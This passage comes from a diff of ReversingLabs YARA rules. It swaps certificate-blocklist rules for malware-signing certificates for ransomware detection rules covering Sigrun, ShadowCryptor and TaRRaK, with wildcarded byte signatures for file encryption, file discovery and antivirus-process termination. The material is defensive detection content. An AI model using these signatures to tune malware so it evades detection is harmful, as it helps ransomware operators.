00 F6 FF FF FF 17 2D 06 D0 4F 00 00 06 26 + 20 ?? 07 00 00 28 60 00 00 06 13 0B 07 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 + 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1C + 00 00 04 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 0E 05 20 ?? 07 00 00 28 + 60 00 00 06 FE 01 13 0D 11 0D 2C 32 ?? 45 01 00 00 00 F6 FF FF FF 20 ?? 07 00 00 28 60 + 00 00 06 13 0B 03 73 ?? 00 00 0A 13 06 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 06 6F ?? + 00 00 0A 00 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 0E 05 20 ?? 07 00 00 28 60 00 00 06 + FE 01 13 0D 11 0D 2C ?? [0-20] 20 ?? 07 00 00 28 60 00 00 06 13 0B 03 73 ?? 00 00 0A 13 + 07 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 07 6F ?? 00 00 0A 00 00 20 ?? ?? 00 00 28 60 + 00 00 06 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A 00 20 ?? ?? 00 00 28 60 00 00 06 13 0B + 02 7B 1C 00 00 04 6F ?? 00 00 0A 00 DD 3B 01 00 00 11 0A 2B 0D 11 0A 20 ?? ?? 00 00 28 + } + $encrypt_routine_3 = { + 60 00 00 06 58 20 ?? 08 00 00 28 60 00 00 06 13 0A 45 26 00 00 00 00 00 00 00 ?? FC FF + FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? ?? FF FF + ?? FD FF FF ?? FD FF FF ?? FD FF FF 00 00 00 00 ?? FD FF FF ?? FD FF FF ?? FD FF FF ?? + FD FF FF ?? FD FF FF ?? FD FF FF ?? ?? FF FF ?? FD FF FF ?? FD FF FF ?? FD FF FF ?? ?? + FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF + FF ?? FE FF FF E8 FE FF FF FC FE FF FF 10 FF FF FF 11 FF FF FF 29 FF FF FF 41 FF FF FF + DE 6D 11 0B 13 0A 11 09 20 ?? 08 00 00 28 60 00 00 06 30 16 ?? 45 01 00 00 00 F6 FF FF + FF 20 ?? 08 00 00 28 60 00 00 06 2B 02 11 09 45 02 00 00 00 00 00 00 00 11 FF FF FF DE + 34 75 4B 00 00 01 14 FE 03 11 09 20 ?? 08 00 00 28 60 00 00 06 FE 03 5F 11 0A 20 ?? 08 + 00 00 28 60 00 00 06 FE 01 5F FE 11 74 4B 00 00 01 28 57 00 00 0A DE 93 20 ?? 08 00 00 + 28 60 00 00 06 28 ?? 00 00 0A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Syncode Sistemas e Tecnologia Ltda" and (pe.signatures[i].serial=="00:e8:6f:46:b6:01:42:09:2a:ae:81:b8:f6:fa:3d:9c:7c" or pe.signatures[i].serial=="e8:6f:46:b6:01:42:09:2a:ae:81:b8:f6:fa:3d:9c:7c") and 1373932799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($encrypt_routine_1 and $encrypt_routine_2 and $encrypt_routine_3) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_1A0Fd2A4Ef4C2A36Ab9C5E8F792A35E2 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Sigrun : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Sigrun ransomware." author = "ReversingLabs" - id = "7148a21a-97d6-59a2-a1cf-442c271bc0b5" - date = "2023-11-08" - modified = "2023-11-08" + id = "fa627192-ed80-5115-a028-014f67f4571d" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2654-L2670" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8e768415998a6a92961986cb0a9d310514d928be93b3e5a9aaa9ec71bf5886ad" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Sigrun.yara#L1-L111" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ea29ec64cdfc0c714fe0acdce5878cb1302dd5aa916811121c644948ce275935" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Sigrun" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 83 7D ?? ?? 53 56 57 8B DA C7 44 24 ?? ?? ?? ?? + ?? 8B F1 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 89 7C 24 ?? 85 C0 75 ?? 85 FF + 75 ?? 5F 5E 5B 8B E5 5D C3 C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? + A1 ?? ?? ?? ?? 89 44 24 ?? A1 ?? ?? ?? ?? 89 44 24 ?? 0F B7 06 66 89 44 24 ?? 83 F8 + ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 + FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF D7 8D + 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 + ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 + ?? 8D 44 24 ?? 50 56 FF D7 F6 44 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? + 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? + ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 53 8D 54 + 24 ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 + 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E + 33 C0 5B 8B E5 5D C3 + } + $encrypt_files_1 = { + 55 8B EC 83 EC ?? 53 57 68 ?? ?? ?? ?? 8B FA 8B D9 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 33 C0 5B 8B E5 5D C3 + 56 8D 45 ?? 33 F6 50 56 56 57 53 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? + C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 68 ?? + ?? ?? ?? 50 FF 75 ?? C7 00 ?? ?? ?? ?? 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 + FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 5E 5F 5B 8B E5 5D C3 + } + $encrypt_files_2 = { + 55 8B EC 53 56 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B DA 8B F9 FF 15 ?? ?? + ?? ?? 57 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CF E8 ?? ?? ?? ?? 85 + C0 74 ?? 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 5D C3 8B CF E8 ?? + ?? ?? ?? 85 C0 75 ?? 83 7B ?? ?? 72 ?? 8B 55 ?? 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 56 + 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? + 5B 5D C3 + } + $encrypt_files_3 = { + 55 8B EC 83 EC ?? 56 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 83 C8 ?? 5F 5E 8B E5 5D C3 8D 45 + ?? 50 8D 45 ?? 50 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 8D 4D ?? 8B D7 E8 + ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 85 C0 74 ?? + C6 04 08 ?? 8B 4D ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 + ?? FF D6 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 05 ?? ?? ?? ?? + ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D6 68 ?? ?? ?? ?? 6A ?? + 57 FF D6 5F 33 C0 5E 8B E5 5D C3 + } + $enum_resources_1 = { + 55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 8B 3D ?? ?? ?? ?? 8B F1 6A ?? 68 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 6A ?? 89 54 24 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? FF D7 8B 1D ?? ?? + ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 85 F6 0F 85 ?? ?? + ?? ?? 8D 44 24 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF D3 85 C0 0F 85 ?? ?? ?? ?? 8D 44 24 + ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF + 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 49 ?? 33 DB 39 5C 24 ?? 0F 86 + ?? ?? ?? ?? 8B 74 24 ?? 83 C6 ?? 83 7E ?? ?? 75 ?? 8B 06 6A ?? 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 6A ?? 89 44 24 ?? FF D7 8B F8 85 FF 74 ?? FF 74 24 ?? 68 ?? ?? ?? ?? 57 FF + 15 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B CF 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? + 6A ?? 57 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? F6 46 ?? ?? 74 ?? FF 75 ?? 8B 54 24 ?? + 8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 43 83 C6 ?? 3B 5C 24 ?? 72 ?? 8D 44 24 ?? C7 44 24 + ?? ?? ?? ?? ?? 50 FF 74 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? FF + } + $enum_resources_2 = { + 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 74 24 ?? FF 74 24 ?? FF + 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 6A ?? 6A ?? 6A ?? FF D3 8B F0 85 F6 0F 85 ?? ?? ?? + ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? + C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? + 33 DB 39 5C 24 ?? 0F 86 ?? ?? ?? ?? 83 C6 ?? 90 83 7E ?? ?? 75 ?? 8B 06 6A ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 89 44 24 ?? FF D7 8B F8 85 FF 74 ?? FF 74 24 ?? 68 ?? + ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B CF 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? + 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? F6 46 ?? ?? 74 ?? FF 75 ?? 8B 54 24 ?? 8D + 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 43 83 C6 ?? 3B 5C 24 ?? 72 ?? 8B 74 + 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 56 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? + 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 74 24 + ?? FF 15 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 8B + C6 5E 5B 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE9\\x87\\x91\\xE5\\x88\\xA9\\xE5\\xAE\\x8F\\xE6\\x98\\x8C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="1a:0f:d2:a4:ef:4c:2a:36:ab:9c:5e:8f:79:2a:35:e2" and 1389311999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($enum_resources_*)) and ($find_files) and ( all of ($encrypt_files_*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_53Bb753B79A99E61A6E822Ac52460C70 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Shadowcryptor : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects ShadowCryptor ransomware." author = "ReversingLabs" - id = "6339d548-775b-52b9-84c5-a79de23a16b2" - date = "2023-11-08" - modified = "2023-11-08" + id = "983e8927-4829-540f-9697-886226fd54ce" + date = "2021-02-11" + modified = "2021-02-11" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2672-L2688" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "24ff4f46fa6e85c25e130459f9b8d6907cf6cd51098e0cf45ec11d54d7de509b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.ShadowCryptor.yara#L1-L89" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "875150db9fc36cd992988bba7d0c05487418b901980bf428ebd427c82fbcacd7" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "ShadowCryptor" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 0F 43 45 ?? 50 8D 85 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B + BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB ?? + 8D A4 24 ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 33 C0 83 7D + ?? ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 85 + ?? ?? ?? ?? 83 F8 ?? 74 ?? A8 ?? 74 ?? 50 8D 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? EB ?? 51 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 C7 ?? 83 D6 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 + 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D6 8B C7 8B 4D ?? 64 89 0D ?? ?? + ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 + } + $encrypt_files = { + 55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? + 33 C4 89 44 24 ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 8B + F1 8D 46 ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? + ?? ?? ?? 66 89 44 24 ?? 89 44 24 ?? 39 46 ?? 0F 84 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ?? + 80 7E ?? ?? 0F 85 ?? ?? ?? ?? 51 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 4E ?? E8 ?? ?? ?? + ?? 8B C8 E8 ?? ?? ?? ?? 8B D0 8B 02 85 C0 74 ?? 8B 00 8B 48 ?? 8B 40 ?? 49 23 4A ?? + 8B 04 88 8D 4C 24 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 46 ?? 8B 4E ?? 48 + 03 C8 8B 46 ?? 48 23 C8 8B 46 ?? 8B 3C 88 83 7F ?? ?? 72 ?? FF 37 E8 ?? ?? ?? ?? 83 + C4 ?? 33 C0 C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 66 89 07 FF 4E ?? 75 ?? 89 46 + ?? 83 EC ?? 8B CC 6A ?? 89 41 ?? 33 C0 C7 41 ?? ?? ?? ?? ?? 50 66 89 01 8D 44 24 ?? + 50 E8 ?? ?? ?? ?? 51 8B CE E8 ?? ?? ?? ?? 8B C8 0B CA 74 ?? 01 46 ?? 11 56 ?? 83 7C + 24 ?? ?? 8D 54 24 ?? 0F 43 54 24 ?? 83 EC ?? 8B FC 33 C0 C7 47 ?? ?? ?? ?? ?? C7 47 + ?? ?? ?? ?? ?? 66 89 07 66 39 02 74 ?? 8B C2 8D 48 ?? 89 4C 24 ?? 66 8B 08 83 C0 ?? + 66 85 C9 75 ?? 2B 44 24 ?? D1 F8 50 52 8B CF E8 ?? ?? ?? ?? 8B 4E ?? 83 79 ?? ?? 8D + 41 ?? 72 ?? 8B 00 8B 91 ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 09 50 E8 + ?? ?? ?? ?? 83 C4 ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? + E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4C 24 ?? 33 + CC E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $terminate_antivirus_processes_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? 33 C0 C7 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 66 89 03 89 + 45 ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 + } + $terminate_antivirus_processes_p2 = { + 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 49 ?? 33 F6 8B BC B5 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 57 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 39 43 ?? 74 ?? 6A ?? 68 ?? + ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 66 83 3F ?? 75 ?? 33 C0 EB ?? 8B C7 8D 50 ?? 8D 49 ?? + 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 50 57 8B CB E8 ?? ?? ?? ?? 46 83 FE ?? + 72 ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 FF + 15 ?? ?? ?? ?? 8B C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? + ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xEB\\x8D\\xB0\\xEC\\x8A\\xA4\\xED\\x81\\xAC\\xED\\x83\\x91\\xEC\\x95\\x84\\xEC\\x9D\\xB4\\xEC\\xBD\\x98" and pe.signatures[i].serial=="53:bb:75:3b:79:a9:9e:61:a6:e8:22:ac:52:46:0c:70" and 1400543999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($terminate_antivirus_processes_p*)) and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_83F68Fc6834Bf8Bd2C801A2D1F1Acc76 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Tarrak : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects TaRRaK ransomware." author = "ReversingLabs" - id = "763d4faf-19af-5349-a643-4773055df47a" - date = "2023-11-08" - modified = "2023-11-08" + id = "a783df87-0c9b-5868-9af0-c32b11e8b71b" + date = "2021-09-06" + modified = "2021-09-06" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2690-L2708" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "35552242f9f0a56b45e30e6f376877446f33e24690ff5d7b03dc776fab178afd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.TaRRaK.yara#L1-L96" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a8c4c4a501d94da94ae4a2e1eb2846e841249659be64dd45f46584885d000635" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "TaRRaK" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 73 ?? ?? ?? ?? 0D 09 08 28 ?? ?? ?? ?? 7D + ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? + 02 08 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 ?? DE ?? 26 DE ?? 00 03 28 ?? ?? ?? ?? + 0A 16 0B 2B ?? 06 07 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 11 ?? 28 ?? ?? ?? ?? + 07 17 58 0B 07 06 8E 69 32 ?? DE ?? 26 DE ?? 2A + } + $encrypt_files_p2 = { + 03 8E 69 17 59 0A 06 17 2F ?? 03 2A 03 06 95 0B 16 0D 1C 1F ?? 06 17 58 5B 58 13 ?? 2B + ?? 09 20 ?? ?? ?? ?? 58 0D 09 18 64 19 5F 13 ?? 16 13 ?? 2B ?? 03 11 ?? 17 58 95 0C 03 + 11 ?? 8F ?? ?? ?? ?? 25 4B 02 09 08 07 11 ?? 11 ?? 04 28 ?? ?? ?? ?? 58 25 13 ?? 54 11 + ?? 0B 11 ?? 17 58 13 ?? 11 ?? 06 32 ?? 03 16 95 0C 03 06 8F ?? ?? ?? ?? 25 4B 02 09 08 + 07 11 ?? 11 ?? 04 28 ?? ?? ?? ?? 58 25 13 ?? 54 11 ?? 0B 16 11 ?? 25 17 59 13 ?? 32 ?? + 03 2A + } + $encrypt_files_p3 = { + 05 1B 64 04 18 62 61 04 19 64 05 1A 62 61 58 03 04 61 0E ?? 0E ?? 19 5F 6A 0E ?? 6E 61 + D4 95 05 61 58 61 2A + } + $encrypt_files_p4 = { + 03 8E 2D ?? 03 2A 02 02 02 03 17 28 ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 16 28 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2A + } + $find_files_p1 = { + 73 ?? ?? ?? ?? 25 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 + 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 2A + } + $find_files_p2 = { + 73 ?? ?? ?? ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1B 28 ?? ?? ?? ?? 6F ?? ?? ?? + ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1F ?? 28 ?? ?? ?? ?? 6F 